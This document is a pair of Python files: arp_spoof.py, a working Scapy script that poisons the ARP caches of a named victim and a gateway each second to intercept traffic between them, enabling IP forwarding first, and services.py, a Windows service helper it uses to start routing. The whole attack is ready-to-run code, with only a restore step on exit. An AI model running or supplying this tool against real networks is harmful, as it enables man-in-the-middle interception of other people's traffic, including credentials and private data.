arp_spoof.py
from scapy.all import Ether, ARP, srp, send
import argparse
import time
import os
import sys
def _enable_linux_iproute():
"""
Enables IP route ( IP Forward ) in linux-based distro
"""
file_path = "/proc/sys/net/ipv4/ip_forward"
with open(file_path) as f:
if f.read() == 1:
# already enabled
return
with open(file_path, "w") as f:
print(1, file=f)
def _enable_windows_iproute():
"""
Enables IP route (IP Forwarding) in Windows
"""
from services import WService
# enable Remote Access service
service = WService("RemoteAccess")
service.start()
def enable_ip_route(verbose=True):
"""
Enables IP forwarding
"""
if verbose:
print("[!] Enabling IP Routing...")
_enable_windows_iproute() if "nt" in os.name else _enable_linux_iproute()
if verbose:
print("[!] IP Routing enabled.")
def get_mac(ip):
"""
Returns MAC address of any device connected to the network
If ip is down, returns None instead
"""
ans, _ = srp(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(pdst=ip), timeout=3, verbose=0)
if ans:
return ans[0][1].src
def spoof(target_ip, host_ip, verbose=True):
"""
Spoofs `target_ip` saying that we are `host_ip`.
it is accomplished by changing the ARP cache of the target (poisoning)
"""
# get the mac address of the target
target_mac = get_mac(target_ip)
# craft the arp 'is-at' operation packet, in other words; an ARP response
# we don't specify 'hwsrc' (source MAC address)
# because by default, 'hwsrc' is the real MAC address of the sender (ours)
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, op='is-at')
# send the packet
# verbose = 0 means that we send the packet without printing any thing
send(arp_response, verbose=0)
if verbose:
# get the MAC address of the default interface we are using
self_mac = ARP().hwsrc
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, self_mac))
def restore(target_ip, host_ip, verbose=True):
"""
Restores the normal process of a regular network
This is done by sending the original informations
(real IP and MAC of `host_ip` ) to `target_ip`
"""
# get the real MAC address of target
target_mac = get_mac(target_ip)
# get the real MAC address of spoofed (gateway, i.e router)
host_mac = get_mac(host_ip)
# crafting the restoring packet
arp_response = ARP(pdst=target_ip, hwdst=target_mac, psrc=host_ip, hwsrc=host_mac, op="is-at")
# sending the restoring packet
# to restore the network to its normal process
# we send each reply seven times for a good measure (count=7)
send(arp_response, verbose=0, count=7)
if verbose:
print("[+] Sent to {} : {} is-at {}".format(target_ip, host_ip, host_mac))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ARP spoof script")
parser.add_argument("target", help="Victim IP Address to ARP poison")
parser.add_argument("host", help="Host IP Address, the host you wish to intercept packets for (usually the gateway)")
parser.add_argument("-v", "--verbose", action="store_true", help="verbosity, default is True (simple message each second)")
args = parser.parse_args()
target, host, verbose = args.target, args.host, args.verbose
enable_ip_route()
try:
while True:
# telling the `target` that we are the `host`
spoof(target, host, verbose)
# telling the `host` that we are the `target`
spoof(host, target, verbose)
# sleep for one second
time.sleep(1)
except KeyboardInterrupt:
print("[!] Detected CTRL+C ! restoring the network, please wait...")
restore(target, host)
restore(host, target)
services.py
import win32serviceutil
import time
class WService:
def __init__(self, service, machine=None, verbose=False):
self.service = service
self.machine = machine
self.verbose = verbose
@property
def running(self):
return win32serviceutil.QueryServiceStatus(self.service)[1] == 4
def start(self):
if not self.running:
win32serviceutil.StartService(self.service)
time.sleep(1)
if self.running:
if self.verbose:
print(f"[+] {self.service} started successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is already running.")
def stop(self):
if self.running:
win32serviceutil.StopService(self.service)
time.sleep(0.5)
if not self.running:
if self.verbose:
print(f"[+] {self.service} stopped successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot stop {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def restart(self):
if self.running:
win32serviceutil.RestartService(self.service)
time.sleep(2)
if self.running:
if self.verbose:
print(f"[+] {self.service} restarted successfully.")
return True
else:
if self.verbose:
print(f"[-] Cannot start {self.service}")
return False
elif self.verbose:
print(f"[!] {self.service} is not running.")
def main(action, service):
service = WService(service, verbose=True)
if action == "start":
service.start()
elif action == "stop":
service.stop()
elif action == "restart":
service.restart()
# getattr(remoteAccessService, action, "start")()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Windows Service Handler")
parser.add_argument("service")
parser.add_argument("-a", "--action", help="action to do, 'start', 'stop' or 'restart'",
action="store", required=True, dest="action")
given_args = parser.parse_args()
service, action = given_args.service, given_args.action
main(action, service)